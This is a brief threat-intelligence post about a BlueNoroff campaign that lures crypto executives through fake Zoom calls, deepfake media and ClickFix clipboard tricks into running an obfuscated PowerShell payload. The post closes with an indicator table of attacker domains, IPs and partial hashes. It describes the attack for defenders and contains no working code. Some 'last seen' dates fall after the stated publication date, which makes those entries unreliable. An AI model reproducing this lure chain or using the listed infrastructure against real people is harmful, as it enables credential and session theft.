BlueNoroff Deepfake Zoom Attack: 100 Crypto Executives Compromised in 5 Minutes
2026-04-30 • Decryption Digest •
https://www.decryptiondigest.com/blog/bluenoroff-deepfake-zoom-crypto-clickfix
BlueNoroff is using fake Zoom meetings, deepfake participant media, and ClickFix clipboard injection to target cryptocurrency and Web3 executives. The attack starts with Calendly-based social engineering and typo-squatted meeting domains, then tricks victims into running an obfuscated PowerShell payload that establishes C2, persistence, credential theft, Telegram session theft, screenshot capture, and UAC bypass. The campaign reportedly reuses stolen webcam footage and AI-generated media to make future lures more convincing, with more than 100 victim identities and over 950 media files recovered from attacker infrastructure. Confirmed targeting is heavily concentrated on crypto founders, executives, and financially adjacent leadership roles.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | check02id.com | 2026-04-16 | 2026-05-28 |
| IPv4 | 83.136.209.22 | 2026-04-16 | 2026-05-28 |
| IPv4 | 83.136.208.246 | 2026-04-16 | 2026-05-28 |
| IPv4 | 104.145.210.107 | 2026-04-16 | 2026-05-28 |
| DOMAIN | zoom.ue01web.us | 2026-04-30 | 2026-04-30 |
| HASH | 17158cd6490a2b3c672d087f3d69107… | 2026-04-27 | 2026-04-30 |
| HASH | db446f0e1d18b43805bfefe1af934ae… | 2026-04-27 | 2026-04-30 |
| HASH | dd1c72823f933952619cbb86aaeaea4… | 2026-04-27 | 2026-04-30 |
| DOMAIN | ms-live.com | 2026-04-27 | 2026-04-30 |
| DOMAIN | thriddata.com | 2026-04-27 | 2026-04-30 |
| DOMAIN | teams-live.org | 2026-04-27 | 2026-04-30 |
| DOMAIN | uu03webzoom.us | 2026-04-27 | 2026-04-30 |